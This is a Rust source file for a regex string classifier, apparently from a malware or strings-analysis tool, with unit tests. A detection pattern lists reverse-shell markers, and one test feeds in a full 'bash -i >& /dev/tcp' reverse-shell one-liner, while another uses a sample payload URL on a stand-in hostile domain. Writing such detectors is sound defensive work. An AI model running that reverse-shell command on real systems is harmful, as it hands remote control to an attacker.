1use crate::classify::StringClassifier;
4use crate::StringCategory;
5use regex::Regex;
6use std::sync::OnceLock;
7
8struct PatternEntry {
9 regex: Regex,
10 category: StringCategory,
11 confidence: f32,
12}
13
14const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
21 (
22 "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
23 StringCategory::Url,
24 0.90,
25 ),
26 (
27 r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
28 StringCategory::IpV4,
29 0.95,
30 ),
31 (
34 concat!(
35 r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
36 r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
37 r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
38 r"|^::$",
39 r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
40 r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
41 r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
42 r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
43 r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
44 r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
45 ),
46 StringCategory::IpV6,
47 0.95,
48 ),
49 (
50 r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
51 StringCategory::Email,
52 0.90,
53 ),
54 (
55 r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
56 StringCategory::UnixPath,
57 0.85,
58 ),
59 (
60 r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
61 StringCategory::WindowsPath,
62 0.85,
63 ),
64 (
65 r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
66 StringCategory::RegistryKey,
67 0.95,
68 ),
69 (
70 r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
71 StringCategory::CryptoAddress,
72 0.70,
73 ),
74 (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
75 (
76 r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
77 StringCategory::CryptoAddress,
78 0.85,
79 ),
80 (
81 r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
82 StringCategory::PrivateKey,
83 0.99,
84 ),
85 (
86 r"^[A-Za-z0-9+/]{20,}={0,2}$",
87 StringCategory::Base64Blob,
88 0.40,
89 ),
90 (
91 r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
92 StringCategory::ShellCommand,
93 0.90,
94 ),
95];
96
97fn patterns() -> &'static [PatternEntry] {
98 static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
99 PATTERNS.get_or_init(|| {
100 PATTERN_SPECS
101 .iter()
102 .filter_map(|(pat, category, confidence)| {
103 Regex::new(pat).ok().map(|regex| PatternEntry {
104 regex,
105 category: category.clone(),
106 confidence: *confidence,
107 })
108 })
109 .collect()
110 })
111}
112
113pub struct RegexClassifier;
115
116impl StringClassifier for RegexClassifier {
117 fn name(&self) -> &str {
118 "regex"
119 }
120
121 fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
122 let mut results = Vec::new();
123 for entry in patterns() {
124 if entry.regex.is_match(input) {
125 results.push((entry.category.clone(), entry.confidence));
126 }
127 }
128 results
129 }
130}
131
132inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
133
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs the classifier under test on `input`.
    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
        RegexClassifier.classify(input)
    }

    /// Returns `true` when classifying `input` reports `expected` at least once.
    fn has_category(input: &str, expected: StringCategory) -> bool {
        classify(input).iter().any(|(category, _)| *category == expected)
    }

    /// Guards the static table: every spec must compile, otherwise a rule
    /// would be missing from the classifier without any other visible sign.
    #[test]
    fn all_patterns_compile() {
        assert_eq!(
            patterns().len(),
            PATTERN_SPECS.len(),
            "every entry of PATTERN_SPECS must compile into a PatternEntry"
        );
    }

    #[test]
    fn classifies_url() {
        assert!(has_category("https://evil.com/payload.exe", StringCategory::Url));
    }

    #[test]
    fn classifies_ipv4() {
        assert!(has_category("192.168.1.1", StringCategory::IpV4));
    }

    #[test]
    fn classifies_email() {
        assert!(has_category("user@example.com", StringCategory::Email));
    }

    #[test]
    fn classifies_unix_path() {
        assert!(has_category("/etc/passwd", StringCategory::UnixPath));
    }

    #[test]
    fn classifies_windows_path() {
        assert!(has_category(
            "C:\\Windows\\System32\\cmd.exe",
            StringCategory::WindowsPath
        ));
    }

    #[test]
    fn classifies_registry_key() {
        assert!(has_category(
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft",
            StringCategory::RegistryKey
        ));
    }

    #[test]
    fn classifies_ethereum_address() {
        assert!(has_category(
            "0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_pem_private_key() {
        assert!(has_category(
            "-----BEGIN RSA PRIVATE KEY-----",
            StringCategory::PrivateKey
        ));
    }

    #[test]
    fn classifies_shell_command() {
        assert!(has_category(
            "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
            StringCategory::ShellCommand
        ));
    }

    #[test]
    fn no_match_for_garbage() {
        assert!(classify("xyzq").is_empty());
    }

    #[test]
    fn classifies_btc_legacy_address() {
        assert!(has_category(
            "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_btc_bech32_address() {
        assert!(has_category(
            "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_base64_blob() {
        assert!(has_category(
            "SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==",
            StringCategory::Base64Blob
        ));
    }

    #[test]
    fn classifier_name() {
        assert_eq!(RegexClassifier.name(), "regex");
    }

    #[test]
    fn classifies_http_url() {
        assert!(has_category("http://example.com/page", StringCategory::Url));
    }

    #[test]
    fn classifies_private_key_variants() {
        let headers = [
            "-----BEGIN PRIVATE KEY-----",
            "-----BEGIN EC PRIVATE KEY-----",
            "-----BEGIN OPENSSH PRIVATE KEY-----",
        ];
        for header in headers {
            assert!(
                has_category(header, StringCategory::PrivateKey),
                "expected PrivateKey classification for {header:?}"
            );
        }
    }

    #[test]
    fn classifies_ipv6_full() {
        assert!(
            has_category(
                "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
                StringCategory::IpV6
            ),
            "expected IpV6 classification for a full IPv6 address"
        );
    }

    #[test]
    fn classifies_ipv6_compressed() {
        assert!(
            has_category("::1", StringCategory::IpV6),
            "expected IpV6 classification for loopback ::1"
        );
    }

    #[test]
    fn classifies_ipv6_mixed_notation() {
        // The zone-ID form is only smoke-tested: the call must complete, but no
        // expectation is pinned on how (or whether) it is classified.
        let _ = classify("fe80::1%eth0");

        assert!(
            has_category("fe80::1", StringCategory::IpV6),
            "expected IpV6 classification for fe80::1 link-local"
        );
    }
}